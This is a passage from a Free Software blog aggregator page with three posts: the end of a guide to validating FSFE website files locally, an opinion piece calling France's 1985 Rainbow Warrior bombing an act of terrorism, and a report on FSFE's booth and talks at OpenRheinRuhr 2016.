In this case, this means that the <p> tag starting in line 41 isn’t closed properly.
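
If you want to check every XHTML file below the current directory in one go before committing, a standard combination of find and xmllint should do the job (this is just a generic shell idiom, not part of the FSFE tooling):

find . -name '*.xhtml' -print0 | xargs -0 xmllint --noout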

Drawbacks

The presented process and script have a few drawbacks. For example, you aren’t able to preview certain very dynamic pages or parts of pages, or those depending on CGI scripts. In most cases you’ll never encounter these, but if you’re getting active in the FSFE’s webmaster team it may happen that you’ll have to fall back on the standard central build system.

Any other issues? Feel free to report them, as they will help FSFE’s editors to work more efficiently :-)

Changelog

29 November 2016: Jonas has pointed out a few bugs and issues with a different GNU/Linux distribution. Should be resolved.

Are all victims of French terrorism equal?

DanielPocock.com - fsfe | 10:50, Sunday, 13 November 2016

Some personal observations about the terrorist atrocities around the world based on evidence from Wikipedia and other sources

The year 2015 saw a series of distressing terrorist attacks in France. 2015 was also the 30th anniversary of the French Government's bombing of a civilian ship at port in New Zealand, murdering a photographer who was on board at the time. This horrendous crime has been chronicled in various movies including The Rainbow Warrior Conspiracy (1989) and The Rainbow Warrior (1993).

The Paris attacks are a source of great anxiety for the people of France, but they are also an attack on Europe and all civilized humanity. Rather than using them to channel more anger towards Muslims and Arabs with another extended (yet ineffective) state of emergency, isn't it about time that France moved on from the evils of its colonial past and "drains the swamp" where unrepentant villains are thriving in its security services?

François Hollande and Ségolène Royal

Royal's brother Gérard Royal allegedly planted the bomb in the terrorist mission to New Zealand. It is ironic that Ségolène Royal is now Minister for Ecology while her brother sank the Greenpeace flagship. If François and Ségolène had married (they have four children together), would Gérard be the president's brother-in-law or terrorist-in-law?

The question has to be asked: if it looks like terrorism, if it smells like terrorism, if the victim of that French Government atrocity is as dead as the victims of Islamic militants littered across the floor of the Bataclan, shouldn't it also be considered an act of terrorism?

If it was not an act of terrorism, then what makes it different? Why do French officials refer to it as nothing more than "a serious error", the term used by Prime Minister Manuel Valls during a visit to New Zealand in 2016? Was it that the French officials felt it was necessary for Liberté, égalité, fraternité? Or is it just a limitation of the English language that we only have one word for terrorism, while French officials have a different word for such acts carried out by those who serve their flag?

If the French government are sincere in their apology, why have they avoided releasing key facts about the atrocity, like who thought up this plot and who gave the orders? Did the soldiers involved volunteer for a mission with the code name Opération Satanique, or did any other members of their unit quit rather than have such a horrendous crime on their conscience? What does that say about the people who carried out the orders?

If somebody apprehended one of these rogue employees of the French Government today, would they be rewarded with France's highest honour, like those tourists who recently apprehended an Islamic terrorist on a high-speed train?

If terrorism is such an absolute evil, why was it so easy for the officials involved to progress with their careers? Would an ex-member of an Islamic terrorist group be able to subsequently obtain US residence and employment as easily as the French terror squad's commander Louis-Pierre Dillais?

When you consider the comments made by Donald Trump recently, the threats of violence and physical aggression against just about anybody he doesn't agree with, is this the type of diplomacy that the US will practice under his rule commencing in 2017? Are people like this motivated by a genuine concern for peace and security, or are these simply criminal acts of vengeance backed by political leaders with the maturity of schoolyard bullies?

Wednesday, 09 November 2016

OpenRheinRuhr 2016 – A report of iron and freedom

English – Max's weblog | 21:55, Wednesday, 09 November 2016


Our Dutch iron fighters

Last weekend, I visited Oberhausen to participate in OpenRheinRuhr, a well-known Free Software event in north-western Germany. Over two days I was part of FSFE’s booth team, gave a talk, and enjoyed talking to tons of like-minded people about politics, technology and other stuff. In the next few minutes you will learn what coat hangers have to do with flat irons and which hotel you shouldn’t book if you plan to visit Oberhausen.

On Friday, Matthias, Erik, and I arrived at the event location, which is normally a museum preserving memories of the heavy industries in the Ruhr area: old machines, the history and background of industry workers, and pictures of people fighting for their rights. Because we arrived a bit early, we helped the (fantastic!) orga team with some remaining work in the exhibition hall before setting up FSFE’s booth. While doing so, we already sold the first t-shirt and baby romper (is this a new record?) and had nice talks. Afterwards we enjoyed a free evening and prepared for the next busy day.

But Matthias and I were in for a bad surprise: our hotel rooms were built for midgets and lacked a few basic features. For example, Matthias’ room had no heating, and in my bathroom someone had stolen the shelf. At least I was given a bedside lamp, except for the little fact that the architect forgot to install a socket nearby. Another (semi-)funny bug was the emergency exits in front of our doors: if you try to escape from dangers inside the hotel, taking these exits won’t rescue you but will instead increase the probability of dying from severe bone fractures. So if you ever need a hotel in Oberhausen, try to avoid the City Lounge Hotel by any means. Pictures at the end of this article.


The large catering and museum hall

On Saturday, André Ockers (NL translation coordinator), Maurice Verhessen (Coordinator Netherlands) and Niko Rikken from the Netherlands joined us to help at the booth and connect with people. Amusingly, we again learnt that the shorter communication is, the more confusing it can be. While Matthias thought he had asked Maurice to bring an iron clothes hanger, Maurice thought he should bring a flat iron. Because he (surprisingly) only had one, he asked Niko to bring his as well. While we wondered why Maurice only had one clothes hanger, our Dutch friends wondered why we would need two flat irons ;-)

During the day, Matthias, Erik, and I gave our talks: Matthias spoke about common misconceptions about Free Software and how to clear them up, Erik explained how people can synchronise their computers and mobile phones with Free Software applications, and I motivated people to become politically active by presenting some lessons learned from my experiences with the Compulsory Routers and Radio Lockdown cases. There were many other talks by FSFE people, for example by Wolf-Dieter and Wolfgang. In the evening we enjoyed the social event with barbecue, free beer, and loooooong waiting queues.

Sunday was far more relaxed than the day before. We had time to talk to more people interested in Free Software and exchanged ideas and thoughts with friends from other initiatives. Among many others, I spoke with people from Freifunk, a Pirate Party politician, a tax consultant with digital ambitions, two system administrators, and a trade unionist. But even the nicest day has to end, and after we packed up the whole booth, merchandise and promotion material again, André took the remaining material to the Netherlands, where it will be presented to the public at FSFE’s T-DOSE booth.
